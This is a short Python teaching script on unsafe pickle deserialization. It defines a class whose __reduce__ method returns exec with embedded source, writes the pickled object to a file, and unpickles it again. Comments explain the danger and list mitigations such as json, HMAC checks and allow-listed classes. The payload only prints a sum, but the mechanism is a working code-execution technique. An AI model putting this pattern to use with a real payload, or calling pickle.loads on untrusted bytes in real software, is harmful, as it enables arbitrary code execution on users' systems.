############################################
# Example of unsafe de-serialization.
#
# ``pickle`` is not a pure data format: loading a pickle calls whatever
# callable the producer embedded in it. The class below shows why bytes
# read from an untrusted source (a file, a cache, a network peer) must be
# treated as code execution, not as data. For untrusted input use a plain
# data format such as ``json``, or verify an ``hmac`` over the bytes before
# they ever reach ``pickle.loads``.
import pickle
import os  # imported by the original script; not referenced below


# 1. A class whose pickle representation carries a payload.
class EvilPickle:
    """Object whose unpickling executes an embedded code string.

    ``pickle`` honours ``__reduce__``: on load it calls the returned
    callable with the returned arguments, so ``exec`` runs the embedded
    source. The payload here only prints a sum; the mechanism is the point.
    """

    def __reduce__(self):
        # Returns ``(callable, args)``; ``pickle.loads`` evaluates
        # ``callable(*args)`` to "reconstruct" the object.
        return exec, ('a = 7\nb = 10\nprint("Sum = ", a + b)', )


# 2. Serialize the object. The bytes themselves are inert; the risk is
#    entirely on the consumer side.
pickle_data = pickle.dumps(EvilPickle())

# Persist the serialized bytes to a file in the current directory.
with open("backup.data", "wb") as backup:
    backup.write(pickle_data)

# 3. Read the file back and de-serialize it. This is the vulnerable call:
#    ``pickle.loads`` on bytes this process did not just produce (a file
#    anyone with write access to the directory could replace) runs the
#    embedded ``exec``. Mitigations: never unpickle untrusted bytes, check
#    an HMAC over the file first, or restrict ``pickle.Unpickler.find_class``
#    to an allow-list of classes.
with open("backup.data", "rb") as backup:
    pickle_data = backup.read()
my_data = pickle.loads(pickle_data)  # result of exec(...), i.e. None
###########################################